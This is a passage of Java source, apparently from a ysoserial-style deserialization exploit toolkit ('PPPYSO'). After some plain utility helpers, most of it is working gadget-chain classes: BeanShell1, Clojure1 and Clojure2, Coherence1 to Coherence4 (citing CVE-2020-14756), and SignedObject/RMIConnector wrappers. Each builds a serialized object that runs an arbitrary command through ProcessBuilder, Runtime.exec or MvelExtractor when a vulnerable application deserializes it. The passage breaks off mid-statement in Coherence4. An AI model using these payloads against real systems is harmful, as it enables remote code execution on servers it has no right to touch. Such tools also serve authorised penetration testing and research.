{ 83 | int ub = b & 0xff; 84 | int h1 = ub / 16; 85 | int h2 = ub % 16; 86 | sw.write(toHexDigit(h1)); 87 | sw.write(toHexDigit(h2)); 88 | } 89 | 90 | private static char toHexDigit(int h) { 91 | char out; 92 | if (h <= 9) out = (char) (h + 0x30); 93 | else out = (char) (h + 0x37); 94 | // Printer.error(h + ": " + out); 95 | return out; 96 | } 97 | 98 | 99 | } -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/Strings.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import java.util.Arrays; 4 | import java.util.Comparator; 5 | import java.util.LinkedList; 6 | import java.util.List; 7 | 8 | public class Strings { 9 | public static String join(Iterable strings, String sep, String prefix, String suffix) { 10 | final StringBuilder sb = new StringBuilder(); 11 | boolean first = true; 12 | for (String s : strings) { 13 | if (!first) sb.append(sep); 14 | if (prefix != null) sb.append(prefix); 15 | sb.append(s); 16 | if (suffix != null) sb.append(suffix); 17 | first = false; 18 | } 19 | return sb.toString(); 20 | } 21 | 22 | public static String repeat(String str, int num) { 23 | final String[] strs = new String[num]; 24 | Arrays.fill(strs, str); 25 | return join(Arrays.asList(strs), "", "", ""); 26 | } 27 | 28 | public static List formatTable(List rows) { 29 | final Integer[] maxLengths = new Integer[rows.get(0).length]; 30 | for (String[] row : rows) { 31 | if (maxLengths.length != row.length) throw new IllegalStateException("mismatched columns"); 32 | for (int i = 0; i < maxLengths.length; i++) { 33 | if (maxLengths[i] == null || maxLengths[i] < row[i].length()) { 34 | maxLengths[i] = row[i].length(); 35 | } 36 | } 37 | } 38 | 39 | final List lines = new LinkedList(); 40 | for (String[] row : rows) { 41 | for (int i = 0; i < maxLengths.length; i++) { 42 | final String pad = repeat(" ", maxLengths[i] - row[i].length()); 43 | row[i] = row[i] + pad; 44 | } 45 | lines.add(join(Arrays.asList(row), " ", "", "")); 46 | } 47 | return lines; 48 | } 49 | 50 | public static class ToStringComparator implements Comparator { 51 | public int compare(Object o1, Object o2) { 52 | return o1.toString().compareTo(o2.toString()); 53 | } 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/maker/AnnotationUtils.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils.maker; 2 | 3 | import com.ppp.utils.Reflections; 4 | 5 | import java.lang.annotation.Annotation; 6 | 7 | /** 8 | * @author Whoopsunix 9 | * 注解工具类 10 | */ 11 | public class AnnotationUtils { 12 | /** 13 | * 注解数组是否含有指定注解 14 | * 15 | * @param values 16 | * @param targetValue 17 | * @return 18 | */ 19 | public static boolean containsValue(String[] values, String targetValue) { 20 | for (String value : values) { 21 | if (value.equals(targetValue)) { 22 | return true; 23 | } 24 | } 25 | return false; 26 | } 27 | 28 | /** 29 | * 获取指定注解 30 | * 31 | * @param values 32 | * @param targetValue 33 | * @return 34 | */ 35 | public static String getValue(String[] values, String targetValue) { 36 | for (String value : values) { 37 | if (value.equals(targetValue)) { 38 | return value; 39 | } 40 | } 41 | return null; 42 | } 43 | 44 | public static boolean containsValue(Class clazz, Class anno, String targetValue) { 45 | try { 46 | Annotation annotation = clazz.getAnnotation(anno); 47 | if (annotation == null) 48 | return false; 49 | 50 | Object value = Reflections.invokeMethod(annotation, "value", new Class[]{}, new Object[]{}); 51 | 52 | if (value instanceof String[]) 53 | return containsValue((String[]) value, targetValue); 54 | else if (value instanceof String) { 55 | return value.equals(targetValue); 56 | } 57 | } catch (Exception e) { 58 | 59 | } 60 | 61 | return false; 62 | } 63 | 64 | } 65 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/maker/CryptoUtils.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils.maker; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.IOException; 5 | import java.math.BigInteger; 6 | import java.security.MessageDigest; 7 | import java.security.NoSuchAlgorithmException; 8 | import java.util.zip.GZIPOutputStream; 9 | 10 | /** 11 | * @author Whoopsunix 12 | * 加解密 13 | */ 14 | public class CryptoUtils { 15 | public static String base64encoder(byte[] bytes) throws Exception { 16 | String base64str = new sun.misc.BASE64Encoder().encode(bytes); 17 | base64str = base64str.replaceAll("\n|\r", ""); 18 | return base64str; 19 | } 20 | 21 | public static byte[] base64decoder(String base64Str) throws Exception { 22 | final byte[] bytes = new sun.misc.BASE64Decoder().decodeBuffer(base64Str); 23 | return bytes; 24 | } 25 | 26 | /** 27 | * Gzip 28 | * 29 | * @param data 30 | * @return 31 | * @throws IOException 32 | */ 33 | public static byte[] compress(byte[] data) throws IOException { 34 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 35 | GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos); 36 | gzipOutputStream.write(data); 37 | gzipOutputStream.close(); 38 | return baos.toByteArray(); 39 | } 40 | 41 | public static String md5(String s) throws NoSuchAlgorithmException { 42 | MessageDigest m = MessageDigest.getInstance("MD5"); 43 | m.update(s.getBytes(), 0, s.length()); 44 | String ret = new BigInteger(1, m.digest()).toString(16).toLowerCase().substring(0, 16); 45 | return ret; 46 | } 47 | 48 | public static String md5Half(String s) throws NoSuchAlgorithmException { 49 | return md5(s).substring(0, 16); 50 | } 51 | 52 | } 53 | -------------------------------------------------------------------------------- /exploit/pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | 5 | com.ppp 6 | exploit 7 | 1.0 8 | jar 9 | 10 | exploit 11 | 12 | 13 | UTF-8 14 | 15 | 16 | 17 | 18 | com.ppp 19 | gadgets 20 | 1.0.2 21 | 22 | 23 | 24 | 25 | PPPYSO-exploit 26 | 27 | 28 | org.apache.maven.plugins 29 | maven-compiler-plugin 30 | 3.8.1 31 | 32 | 6 33 | 6 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /exploit/src/main/java/com/ppp/ExploitBuilder.java: -------------------------------------------------------------------------------- 1 | package com.ppp; 2 | 3 | import com.ppp.exploit.Exploit; 4 | import com.ppp.exploit.ExploitPayload; 5 | import com.ppp.sinks.annotation.EnchantType; 6 | import com.ppp.sinks.annotation.Sink; 7 | import com.ppp.utils.maker.ClassUtils; 8 | 9 | import java.lang.reflect.Method; 10 | import java.util.ArrayList; 11 | import java.util.LinkedList; 12 | import java.util.List; 13 | 14 | /** 15 | * @author Whoopsunix 16 | */ 17 | public class ExploitBuilder { 18 | private static final String exploitPackageName = "com.ppp.exploit"; 19 | 20 | public static void run(Class exploitClass, Object gadget, ExploitHelper exploitHelper) throws Exception { 21 | Printer.title(exploitClass.getSimpleName()); 22 | ExploitPayload exploitPayload = exploitClass.newInstance(); 23 | exploitPayload.exploit(gadget, exploitHelper); 24 | } 25 | 26 | public static Class getExploitClass(String exploit) throws Exception { 27 | // 调用链检查 28 | List> classes = ClassUtils.getClasses(exploitPackageName); 29 | for (Class clazz : classes) { 30 | String className = clazz.getSimpleName(); 31 | if (className.equalsIgnoreCase(exploit)) { 32 | return (Class) clazz; 33 | } 34 | } 35 | Printer.warn(String.format("No such exploit: %s", exploit)); 36 | showGadgetClass(); 37 | return null; 38 | } 39 | 40 | public static void showGadgetClass() throws Exception { 41 | List> classes = ClassUtils.getClasses(exploitPackageName); 42 | ArrayList exploits = new ArrayList(); 43 | 44 | for (Class clazz : classes) { 45 | Exploit annotation = clazz.getAnnotation(Exploit.class); 46 | if (annotation != null) 47 | exploits.add(clazz.getSimpleName()); 48 | } 49 | Printer.blueInfo("Exploit: " + exploits); 50 | 51 | System.exit(0); 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /exploit/src/main/java/com/ppp/ExploitHelper.java: -------------------------------------------------------------------------------- 1 | package com.ppp; 2 | 3 | /** 4 | * @author Whoopsunix 5 | * 6 | * Exploit 信息 7 | */ 8 | public class ExploitHelper { 9 | private String host; 10 | private Integer port; 11 | 12 | public String getHost() { 13 | return host; 14 | } 15 | 16 | public void setHost(String host) { 17 | this.host = host; 18 | } 19 | 20 | public int getPort() { 21 | return port; 22 | } 23 | 24 | public void setPort(int port) { 25 | this.port = port; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /exploit/src/main/java/com/ppp/exploit/Exploit.java: -------------------------------------------------------------------------------- 1 | package com.ppp.exploit; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | /** 9 | * @author Whoopsunix 10 | */ 11 | @Target(ElementType.TYPE) 12 | @Retention(RetentionPolicy.RUNTIME) 13 | public @interface Exploit { 14 | 15 | } 16 | -------------------------------------------------------------------------------- /exploit/src/main/java/com/ppp/exploit/ExploitPayload.java: -------------------------------------------------------------------------------- 1 | package com.ppp.exploit; 2 | 3 | import com.ppp.ExploitHelper; 4 | 5 | /** 6 | * @author Whoopsunix 7 | */ 8 | public interface ExploitPayload { 9 | public void exploit(Object gadget, ExploitHelper exploitHelper); 10 | } 11 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/ObjectPayload.java: -------------------------------------------------------------------------------- 1 | package com.ppp; 2 | 3 | import com.ppp.sinks.SinksHelper; 4 | 5 | /** 6 | * @author Whoopsunix 7 | */ 8 | public interface ObjectPayload { 9 | public T getObject(SinksHelper sinksHelper) throws Exception; 10 | } 11 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/WrapSerialization.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain; 2 | 3 | import com.ppp.Printer; 4 | import com.ppp.sinks.SinksHelper; 5 | import com.ppp.sinks.annotation.EnchantEnums; 6 | import com.ppp.utils.RanDomUtils; 7 | import com.ppp.utils.Reflections; 8 | import org.apache.commons.collections.functors.ConstantTransformer; 9 | import org.apache.commons.collections.functors.InvokerTransformer; 10 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 11 | import org.apache.commons.collections.map.LazyMap; 12 | 13 | import javax.management.remote.JMXServiceURL; 14 | import javax.management.remote.rmi.RMIConnector; 15 | import java.io.Serializable; 16 | import java.security.KeyPair; 17 | import java.security.KeyPairGenerator; 18 | import java.security.Signature; 19 | import java.security.SignedObject; 20 | import java.util.HashMap; 21 | import java.util.Map; 22 | 23 | /** 24 | * @author Whoopsunix 25 | *

26 | * 二次反序列化 27 | */ 28 | public class WrapSerialization { 29 | 30 | public static Object scheduler(Object object, SinksHelper sinksHelper) throws Exception { 31 | EnchantEnums wrapSerialization = sinksHelper.getWrapSerialization(); 32 | 33 | if (wrapSerialization.equals(EnchantEnums.SignedObject)) { 34 | object = signedObject(object); 35 | Printer.yellowInfo("Wrap Serialization by SignedObject"); 36 | } else if (wrapSerialization.equals(EnchantEnums.RMIConnector)) { 37 | object = rmiConnector(object); 38 | } 39 | return object; 40 | } 41 | 42 | /** 43 | * getter 方法调用 getObject 44 | * 45 | * @param object 46 | * @return 47 | * @throws Exception 48 | */ 49 | public static Object signedObject(Object object) throws Exception { 50 | KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA"); 51 | kpg.initialize(1024); 52 | KeyPair kp = kpg.generateKeyPair(); 53 | SignedObject signedObject = new SignedObject((Serializable) object, kp.getPrivate(), 54 | Signature.getInstance("DSA")); 55 | return signedObject; 56 | } 57 | 58 | /** 59 | * 任意方法调用 connect 60 | * 需要任意方法调用 61 | * 62 | * @param object 63 | * @return 64 | * @throws Exception 65 | */ 66 | public static Object rmiConnector(Object object) throws Exception { 67 | String s = RanDomUtils.generateRandomString(1); 68 | 69 | JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://"); 70 | Reflections.setFieldValue(jmxServiceURL, "urlPath", "/stub/" + object); 71 | RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, null); 72 | 73 | /** 74 | * 以下为任意方法调用 75 | */ 76 | InvokerTransformer invokerTransformer = new InvokerTransformer("connect", null, null); 77 | HashMap map = new HashMap(); 78 | Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1)); 79 | TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, rmiConnector); 80 | 81 | HashMap hashMap = new HashMap(); 82 | hashMap.put(tiedMapEntry, s); 83 | lazyMap.remove(rmiConnector); 84 | 85 | Reflections.setFieldValue(lazyMap, "factory", invokerTransformer); 86 | 87 | return hashMap; 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/beanshell/BeanShell1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.beanshell; 2 | 3 | import bsh.Interpreter; 4 | import bsh.XThis; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.RanDomUtils; 12 | import com.ppp.utils.Reflections; 13 | import com.ppp.utils.Strings; 14 | 15 | import java.lang.reflect.InvocationHandler; 16 | import java.lang.reflect.Method; 17 | import java.lang.reflect.Proxy; 18 | import java.util.Arrays; 19 | import java.util.Comparator; 20 | import java.util.PriorityQueue; 21 | 22 | 23 | @Dependencies({"org.beanshell:bsh:2.0b5"}) 24 | @Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711}) 25 | @Sink({Sink.Default}) 26 | public class BeanShell1 implements ObjectPayload { 27 | 28 | public static void main(String[] args) throws Exception { 29 | PayloadRunner.run(BeanShell1.class, args); 30 | } 31 | 32 | public Object getObject(SinksHelper sinksHelper) throws Exception { 33 | // // sink 34 | // Object sinkObject = SinkScheduler.builder(sinksHelper); 35 | 36 | String command = sinksHelper.getCommand(); 37 | 38 | Object kickOffObject = getChain(command); 39 | 40 | return kickOffObject; 41 | } 42 | 43 | public Object getChain(String command) throws Exception { 44 | String s = RanDomUtils.generateRandomString(1); 45 | String s1 = RanDomUtils.generateRandomString(3, 6); 46 | 47 | // BeanShell payload 48 | String payload = String.format("compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{%s}).start();return new Integer(1);}", Strings.join( 49 | Arrays.asList(command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"").split(" ")), 50 | ",", "\"", "\"")); 51 | 52 | // Create Interpreter 53 | Interpreter i = new Interpreter(); 54 | 55 | Method method = i.getClass().getDeclaredMethod("setu", String.class, Object.class); 56 | method.setAccessible(true); 57 | method.invoke(i, "bsh.cwd", s1); 58 | 59 | // Evaluate payload 60 | i.eval(payload); 61 | 62 | // Create InvocationHandler 63 | XThis xt = new XThis(i.getNameSpace(), i); 64 | InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt); 65 | 66 | // Create Comparator Proxy 67 | Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class[]{Comparator.class}, handler); 68 | 69 | // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 70 | final PriorityQueue priorityQueue = new PriorityQueue(2, comparator); 71 | Object[] queue = new Object[]{s, s}; 72 | Reflections.setFieldValue(priorityQueue, "queue", queue); 73 | Reflections.setFieldValue(priorityQueue, "size", 2); 74 | 75 | return priorityQueue; 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/clojure/Clojure1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.clojure; 2 | 3 | import clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a; 4 | import clojure.lang.PersistentArrayMap; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.Strings; 12 | 13 | import java.util.Arrays; 14 | import java.util.HashMap; 15 | import java.util.Map; 16 | 17 | /* 18 | Gadget chain: 19 | ObjectInputStream.readObject() 20 | HashMap.readObject() 21 | AbstractTableModel$ff19274a.hashCode() 22 | clojure.core$comp$fn__4727.invoke() 23 | clojure.core$constantly$fn__4614.invoke() 24 | clojure.main$eval_opt.invoke() 25 | 26 | Requires: 27 | org.clojure:clojure 28 | Versions since 1.2.0 are vulnerable, although some class names may need to be changed for other versions 29 | */ 30 | @Dependencies({"org.clojure:clojure:<=1.8.0"}) 31 | @Authors({Authors.JACKOFMOSTTRADES}) 32 | @Sink({Sink.Default}) 33 | public class Clojure1 implements ObjectPayload { 34 | 35 | public static void main(String[] args) throws Exception { 36 | PayloadRunner.run(Clojure1.class, args); 37 | } 38 | 39 | public Object getObject(SinksHelper sinksHelper) throws Exception { 40 | // sink 41 | String command = sinksHelper.getCommand(); 42 | 43 | Object kickOffObject = getChain(command); 44 | 45 | return kickOffObject; 46 | } 47 | 48 | public Object getChain(String command) throws Exception { 49 | String cmd = Strings.join(Arrays.asList(command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\").split(" ")), " ", "\"", "\""); 50 | 51 | final String clojurePayload = 52 | String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", cmd); 53 | 54 | 55 | Map fnMap = new HashMap(); 56 | fnMap.put("hashCode", new clojure.core$constantly().invoke(0)); 57 | 58 | AbstractTableModel$ff19274a model = new AbstractTableModel$ff19274a(); 59 | model.__initClojureFnMappings(PersistentArrayMap.create(fnMap)); 60 | 61 | HashMap hashMap = new HashMap(); 62 | hashMap.put(model, null); 63 | 64 | fnMap.put("hashCode", 65 | new clojure.core$comp().invoke( 66 | new clojure.main$eval_opt(), 67 | new clojure.core$constantly().invoke(clojurePayload))); 68 | model.__initClojureFnMappings(PersistentArrayMap.create(fnMap)); 69 | 70 | return hashMap; 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/clojure/Clojure2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.clojure; 2 | 3 | import clojure.lang.Iterate; 4 | import com.ppp.KickOff; 5 | import com.ppp.ObjectPayload; 6 | import com.ppp.annotation.Authors; 7 | import com.ppp.annotation.Dependencies; 8 | import com.ppp.secmgr.PayloadRunner; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.ppp.utils.RanDomUtils; 12 | import com.ppp.utils.Reflections; 13 | import com.ppp.utils.Strings; 14 | 15 | import java.util.Arrays; 16 | 17 | /* 18 | Gadget chain: 19 | ObjectInputStream.readObject() 20 | HashMap.readObject() 21 | clojure.lang.ASeq.hashCode() 22 | clojure.lang.Iterate.first() -> null 23 | clojure.lang.Iterate.next() -> new Iterate(f, null, UNREALIZED_SEED) 24 | clojure.lang.Iterate.first() -> this.f.invoke(null) 25 | clojure.core$constantly$fn__4614.invoke() 26 | clojure.main$eval_opt.invoke() 27 | 28 | Requires: 29 | org.clojure:clojure 30 | Versions since 1.8.0 are vulnerable; for earlier versions see Clojure.java. 31 | Versions up to 1.10.0-alpha4 are known to be vulnerable. 32 | */ 33 | @Dependencies({"org.clojure:clojure:<=1.8.0"}) 34 | @Authors({Authors.JACKOFMOSTTRADES}) 35 | @Sink({Sink.Default}) 36 | public class Clojure2 implements ObjectPayload { 37 | 38 | public static void main(String[] args) throws Exception { 39 | PayloadRunner.run(Clojure2.class, args); 40 | } 41 | 42 | public Object getObject(SinksHelper sinksHelper) throws Exception { 43 | // sink 44 | String command = sinksHelper.getCommand(); 45 | 46 | Object kickOffObject = getChain(command); 47 | 48 | return kickOffObject; 49 | } 50 | 51 | public Object getChain(String command) throws Exception { 52 | String s = RanDomUtils.generateRandomString(3); 53 | String cmd = Strings.join(Arrays.asList(command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\").split(" ")), " ", "\"", "\""); 54 | 55 | final String clojurePayload = 56 | String.format("(use '[clojure.java.shell :only [sh]]) (sh %s)", cmd); 57 | 58 | Iterate model = Reflections.createWithoutConstructor(Iterate.class); 59 | Object evilFn = 60 | new clojure.core$comp().invoke( 61 | new clojure.main$eval_opt(), 62 | new clojure.core$constantly().invoke(clojurePayload)); 63 | 64 | // Wrap the evil function with a composition that invokes the payload, then throws an exception. Otherwise Iterable() 65 | // ends up triggering the payload in an infinite loop as it tries to compute the hashCode. 66 | evilFn = new clojure.core$comp().invoke( 67 | new clojure.main$eval_opt(), 68 | new clojure.core$constantly().invoke(String.format("(throw (Exception. \"%s\"))", s)), 69 | evilFn); 70 | 71 | Reflections.setFieldValue(model, "f", evilFn); 72 | return KickOff.makeMap(model, null); 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/coherence/Coherence1.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.coherence; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.tangosol.util.ValueExtractor; 12 | import com.tangosol.util.extractor.ChainedExtractor; 13 | import com.tangosol.util.extractor.ReflectionExtractor; 14 | import com.tangosol.util.filter.LimitFilter; 15 | 16 | import java.lang.reflect.Field; 17 | 18 | // CVE-2020-14756 19 | 20 | /* 21 | * gadget: 22 | * AttributeHolder.readExternal() 23 | ExternalizableHelper.readObject() 24 | ExternalizableHelper.readObjectInternal() 25 | ExternalizableHelper.readExternalizableLite() 26 | PartialResult.readExternal() 27 | PartialResult.add() 28 | SortedBag.add() 29 | ... 30 | AbstractExtractor.compare() 31 | MvelExtractor.extract() 32 | */ 33 | 34 | @Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"}) 35 | @Authors({Authors.CCKUAILONG}) 36 | @Sink({Sink.Default}) 37 | public class Coherence1 implements ObjectPayload { 38 | public static void main(String[] args) throws Exception { 39 | PayloadRunner.run(Coherence1.class, args); 40 | } 41 | 42 | public Object getObject(SinksHelper sinksHelper) throws Exception { 43 | // sink 44 | Object sinkObject = SinkScheduler.builder(sinksHelper); 45 | 46 | Object kickOffObject = getChain((String) sinkObject); 47 | 48 | return kickOffObject; 49 | } 50 | 51 | public Object getChain(String command) throws Exception { 52 | ValueExtractor[] valueExtractors = new ValueExtractor[]{ 53 | new ReflectionExtractor("getMethod", new Object[]{ 54 | "getRuntime", new Class[0] 55 | }), 56 | new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), 57 | // new ReflectionExtractor("exec", new Object[]{new String[]{"bash", "-c", command}}) 58 | new ReflectionExtractor("exec", new Object[]{command}) 59 | }; 60 | 61 | LimitFilter limitFilter = new LimitFilter(); 62 | limitFilter.setTopAnchor(Runtime.class); 63 | 64 | Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); 65 | m_comparator.setAccessible(true); 66 | m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors)); 67 | Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); 68 | m_oAnchorTop.setAccessible(true); 69 | m_oAnchorTop.set(limitFilter, Runtime.class); 70 | 71 | return KickOff.badAttributeValueExpException(limitFilter); 72 | // BadAttributeValueExpException expException = new BadAttributeValueExpException(null); 73 | // Field val = expException.getClass().getDeclaredField("val"); 74 | // val.setAccessible(true); 75 | // val.set(expException, limitFilter); 76 | // 77 | // return expException; 78 | } 79 | } -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/coherence/Coherence2.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.coherence; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.tangosol.coherence.rest.util.extractor.MvelExtractor; 12 | import com.tangosol.util.filter.LimitFilter; 13 | 14 | import java.lang.reflect.Field; 15 | 16 | /* 17 | * gadget: 18 | * BadAttributeValueExpException.readObject() 19 | * com.tangosol.util.filter.LimitFilter.toString() 20 | * com.tangosol.coherence.rest.util.extractor.MvelExtractor; 21 | */ 22 | @Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"}) 23 | @Authors({Authors.CCKUAILONG}) 24 | @Sink({Sink.Default}) 25 | public class Coherence2 implements ObjectPayload { 26 | public static void main(String[] args) throws Exception { 27 | PayloadRunner.run(Coherence2.class, args); 28 | } 29 | 30 | public Object getObject(SinksHelper sinksHelper) throws Exception { 31 | // sink 32 | Object sinkObject = SinkScheduler.builder(sinksHelper); 33 | 34 | Object kickOffObject = getChain((String) sinkObject); 35 | 36 | return kickOffObject; 37 | } 38 | 39 | public Object getChain(String command) throws Exception { 40 | MvelExtractor mvelExtractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\""+command+"\")"); 41 | 42 | LimitFilter limitFilter = new LimitFilter(); 43 | limitFilter.setTopAnchor(Runtime.class); 44 | Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); 45 | m_comparator.setAccessible(true); 46 | m_comparator.set(limitFilter, mvelExtractor); 47 | Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); 48 | m_oAnchorTop.setAccessible(true); 49 | m_oAnchorTop.set(limitFilter, Runtime.class); 50 | 51 | return KickOff.badAttributeValueExpException(limitFilter); 52 | } 53 | } -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/coherence/Coherence3.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.coherence; 2 | 3 | import com.ppp.KickOff; 4 | import com.ppp.ObjectPayload; 5 | import com.ppp.annotation.Authors; 6 | import com.ppp.annotation.Dependencies; 7 | import com.ppp.secmgr.PayloadRunner; 8 | import com.ppp.sinks.SinkScheduler; 9 | import com.ppp.sinks.SinksHelper; 10 | import com.ppp.sinks.annotation.Sink; 11 | import com.tangosol.util.ValueExtractor; 12 | import com.tangosol.util.extractor.ReflectionExtractor; 13 | import com.tangosol.util.filter.LimitFilter; 14 | 15 | import java.lang.reflect.Field; 16 | 17 | /* 18 | * gadget: 19 | * BadAttributeValueExpException.readObject() 20 | * com.tangosol.util.filter.LimitFilter.toString() 21 | * com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 22 | */ 23 | @Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"}) 24 | @Authors({Authors.CCKUAILONG}) 25 | @Sink({Sink.TemplatesImpl}) 26 | public class Coherence3 implements ObjectPayload { 27 | public static void main(String[] args) throws Exception { 28 | PayloadRunner.run(Coherence3.class, args); 29 | } 30 | 31 | public Object getObject(SinksHelper sinksHelper) throws Exception { 32 | // sink 33 | Object sinkObject = SinkScheduler.builder(sinksHelper); 34 | 35 | Object kickOffObject = getChain(sinkObject); 36 | 37 | return kickOffObject; 38 | } 39 | 40 | public Object getChain(Object templates) throws Exception { 41 | ValueExtractor valueExtractor = new ReflectionExtractor("getOutputProperties", new Object[0]); 42 | LimitFilter limitFilter = new LimitFilter(); 43 | limitFilter.setTopAnchor(templates); 44 | 45 | Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); 46 | m_comparator.setAccessible(true); 47 | m_comparator.set(limitFilter, valueExtractor); 48 | 49 | Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); 50 | m_oAnchorTop.setAccessible(true); 51 | m_oAnchorTop.set(limitFilter, templates); 52 | 53 | return KickOff.badAttributeValueExpException(limitFilter); 54 | } 55 | } -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/chain/coherence/Coherence4.java: -------------------------------------------------------------------------------- 1 | package com.ppp.chain.coherence; 2 | 3 | import com.ppp.ObjectPayload; 4 | import com.ppp.annotation.Authors; 5 | import com.ppp.annotation.Dependencies; 6 | import com.ppp.secmgr.PayloadRunner; 7 | import com.ppp.sinks.SinkScheduler; 8 | import com.ppp.sinks.SinksHelper; 9 | import com.ppp.sinks.annotation.Sink; 10 | import com.tangosol.coherence.rest.util.extractor.MvelExtractor; 11 | import com.tangosol.coherence.servlet.AttributeHolder; 12 | import com.tangosol.util.SortedBag; 13 | import com.tangosol.util.aggregator.TopNAggregator; 14 | 15 | import java.lang.reflect.Field; 16 | import java.lang.reflect.Method; 17 | 18 | // CVE-2020-14756 19 | 20 | /* 21 | * gadget: 22 | * AttributeHolder.readExternal() 23 | ExternalizableHelper.readObject() 24 | ExternalizableHelper.readObjectInternal() 25 | ExternalizableHelper.readExternalizableLite() 26 | PartialResult.readExternal() 27 | PartialResult.add() 28 | SortedBag.add() 29 | ... 30 | AbstractExtractor.compare() 31 | MvelExtractor.extract() 32 | */ 33 | @Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"}) 34 | @Authors({Authors.CCKUAILONG}) 35 | @Sink({Sink.Default}) 36 | public class Coherence4 implements ObjectPayload { 37 | public static void main(String[] args) throws Exception { 38 | PayloadRunner.run(Coherence4.class, args); 39 | } 40 | 41 | public Object getObject(SinksHelper sinksHelper) throws Exception { 42 | // sink 43 | Object sinkObject = SinkScheduler.builder(sinksHelper); 44 | 45 | Object kickOffObject = getChain((String) sinkObject); 46 | 47 | return kickOffObject; 48 | } 49 | 50 | public Object getChain(String command) throws Exception { 51 | MvelExtractor extractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\""+command+"\")"); 52 | MvelExtractor extractor2 = new MvelExtractor(""); 53 | 54 | SortedBag sortedBag = new 